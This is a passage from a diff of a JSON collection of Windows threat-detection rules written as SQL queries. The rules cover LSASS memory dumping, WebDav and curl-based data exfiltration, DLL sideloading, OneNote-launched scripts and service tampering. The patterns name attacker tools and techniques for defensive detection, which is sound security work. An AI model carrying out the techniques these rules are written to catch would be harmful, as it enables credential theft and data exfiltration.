CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_wazuh.yml" + "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" }, { - "title": "APT PRIVATELOG Image Load Pattern", - "id": 
"33a2d1dd-f3b0-40bd-8baf-7974468927cc", + "title": "WebDav Client Execution", + "id": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", "status": "test", - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Rarely observed" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\clfsw32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\')" ], - "filename": "image_load_usp_svchost_clfsw32.yml" + "filename": "proc_creation_win_rundll32_webdav_client_execution.yml" }, { - "title": "Abusing Azure Browser SSO", - "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", - "status": "test", - "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. 
the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", - "author": "Den Iuzvyk", + "title": "Suspicious Svchost Process", + "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "status": "experimental", + "description": "Detects a suspicious svchost process start", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.002" + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\OneDrive.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName = ''))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentProcessName = '') OR (ParentProcessName = '') OR (ParentProcessName = '-')))" ], - 
"filename": "image_load_abusing_azure_browser_sso.yml" + "filename": "proc_creation_win_svchost_susp_parent_process.yml" }, { - "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", - "id": "75e508f7-932d-4ebc-af77-269237a84ce1", - "status": "experimental", - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious aspnet_compiler.exe Execution", + "id": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", + "status": "test", + "description": "Execute C# code with the Build Provider and proper folder structure in place.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.003" + "attack.t1127" ], "falsepositives": [ - "Unikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%aspnet\\_compiler.exe%' ESCAPE '\\')" ], - "filename": "image_load_cmstp_load_dll_from_susp_location.yml" + "filename": "proc_creation_win_lolbin_aspnet_compiler.yml" }, { - "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", - "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", - "status": "experimental", - "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", - "author": "Greg (rule)", + "title": "Zip A Folder With PowerShell For Staging 
In Temp", + "id": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "status": "test", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Compress-Archive %' ESCAPE '\\' AND CommandLine LIKE '% -Path %' ESCAPE '\\' AND CommandLine LIKE '% -DestinationPath %' ESCAPE '\\' AND CommandLine LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "image_load_dll_sdiageng_load_by_msdt.yml" + "filename": "proc_creation_win_powershell_zip_compress.yml" }, { - "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", - "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", + "title": "Suspicious RunAs-Like Flag Combination", + "id": "50d66fb0-03f8-4da0-8add-84e77d12a020", "status": "experimental", - "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. 
seen in PsExec-like tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -u system %' ESCAPE '\\' OR CommandLine LIKE '% --user system %' ESCAPE '\\' OR CommandLine LIKE '% -u NT%' ESCAPE '\\' OR CommandLine LIKE '% -u \"NT%' ESCAPE '\\' OR CommandLine LIKE '% -u ''NT%' ESCAPE '\\' OR CommandLine LIKE '% --system %' ESCAPE '\\' OR CommandLine LIKE '% -u administrator %' ESCAPE '\\') AND (CommandLine LIKE '% -c cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c \"cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c \"powershell%' ESCAPE '\\' OR CommandLine LIKE '% --command cmd%' ESCAPE '\\' OR CommandLine LIKE '% --command powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c whoami%' ESCAPE '\\' OR CommandLine LIKE '% -c wscript%' ESCAPE '\\' OR CommandLine LIKE '% -c cscript%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_non_existent_dlls.yml" + "filename": "proc_creation_win_susp_privilege_escalation_cli_patterns.yml" }, { - "title": "Potential Rcdll.DLL Sideloading", - "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", - 
"status": "experimental", - "description": "Detects potential DLL sideloading of rcdll.dll", - "author": "X__Junior", + "title": "File or Folder Permissions Modifications", + "id": "37ae075c-271b-459b-8d7b-55ad5f993dd8", + "status": "test", + "description": "Detects a file or folder's permissions being modified or tampered with.", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1222.001" ], "falsepositives": [ - "Unknown" + "Users interacting with the files on their own (unlikely unless privileged users).", + "Dynatrace app" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\cacls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\icacls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND (CommandLine LIKE '%/grant%' ESCAPE '\\' OR CommandLine LIKE '%/setowner%' ESCAPE '\\' OR CommandLine LIKE '%/inheritance:r%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\takeown.exe' ESCAPE '\\') AND NOT ((CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\connectivity.history /reset' ESCAPE '\\') OR (CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\config.properties /grant :r %' ESCAPE '\\' AND CommandLine LIKE '%S-1-5-19:F%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code%' ESCAPE '\\' OR ParentProcessName LIKE 
'%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_rcdll.yml" + "filename": "proc_creation_win_susp_file_permission_modifications.yml" }, { - "title": "VMGuestLib DLL Sideload", - "id": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", - "status": "experimental", - "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Explorer Process Tree Break", + "id": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", + "status": "test", + "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036" ], "falsepositives": [ - "FP could occur if the legitimate version of vmGuestLib already exists on the system" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\VMware\\\\VMware Tools\\\\vmStatsProvider\\\\win32%' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\vmGuestLib.dll%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe' ESCAPE '\\') AND NOT (Signed = 'true'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}%' ESCAPE '\\' OR (CommandLine LIKE '%explorer.exe%' ESCAPE '\\' AND CommandLine LIKE '% /root,%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_vmguestlib.yml" + "filename": "proc_creation_win_explorer_break_process_tree.yml" }, { - "title": "Potential DLL Sideloading Using Coregen.exe", - "id": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", + 
"title": "Suspicious Microsoft OneNote Child Process", + "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", "status": "experimental", - "description": "Detect usage of DLL \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", - "author": "frack113", + "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1055" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" ], "falsepositives": [ - "Unknown" + "File located in the AppData folder with trusted signature" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\coregen.exe' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Silverlight\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' 
ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" ], - "filename": "image_load_side_load_coregen.yml" + "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" }, { - "title": "Potential Iviewers.DLL Sideloading", - "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "title": "Suspicious Execution of Shutdown to Log Out", + "id": "ec290c06-9b6b-4338-8b6b-095c0f284f10", "status": "experimental", - "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", - "author": "X__Junior", + "description": "Detects the rare use of the command line tool shutdown to logoff a user", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.impact", + "attack.t1529" ], "falsepositives": [ "Unknown" ], - "level": "high", + 
"level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND CommandLine LIKE '%/l%' ESCAPE '\\')" ], - "filename": "image_load_side_load_iviewers.yml" + "filename": "proc_creation_win_shutdown_logoff.yml" }, { - "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", - "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. 
This can be used to hide services or make them unstoppable.", + "author": "Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + "filename": 
"proc_creation_win_sc_sdset_deny_service_access.yml" }, { - "title": "DotNET DLL Loaded Via Office Applications", - "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", - "status": "test", - "description": "Detects any assembly DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", + "id": "43103702-5886-11ed-9b6a-0242ac120002", + "status": "experimental", + "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", + "author": "bohops", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "False positives depend on custom use of vsls-agent.exe" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\vsls-agent.exe' ESCAPE '\\' AND CommandLine LIKE '%--agentExtensionPath%' ESCAPE '\\') AND NOT (CommandLine LIKE '%Microsoft.VisualStudio.LiveShare.Agent.%' ESCAPE '\\'))" ], - "filename": "image_load_office_dotnet_assembly_dll_load.yml" + "filename": "proc_creation_win_vslsagent_agentextensionpath_load.yml" }, { - "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", - "id": "8cde342c-ba48-4b74-b615-172c330f2e93", + "title": "Potential Data Exfiltration Activity Via 
CommandLine Tools", + "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", "status": "experimental", - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "description": "Detects the use of various CLI utilities exfiltrating data via web requests", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE 